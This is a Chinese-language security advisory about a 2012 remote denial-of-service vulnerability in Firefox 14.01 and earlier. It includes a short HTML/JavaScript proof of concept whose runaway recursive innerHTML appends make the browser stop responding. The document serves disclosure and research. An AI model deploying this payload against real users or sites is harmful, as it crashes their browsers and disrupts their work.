Mozilla Firefox远程拒绝服务漏洞


发布日期:2012-08-17
更新日期:2012-08-22

受影响系统:
Mozilla Firefox <= 14.01
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55091

Firefox是一款非常流行的开源WEB浏览器。

Mozilla Firefox 14.01及之前版本在实现上存在远程拒绝服务漏洞,攻击者可利用此漏洞使受影响计算机停止响应。

<*来源:Jean Pascal Pereira
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Jean Pascal Pereira ()提供了如下测试方法:

<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x');
};

e('x')
</script>
</html>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mozilla.org/security/

相关内容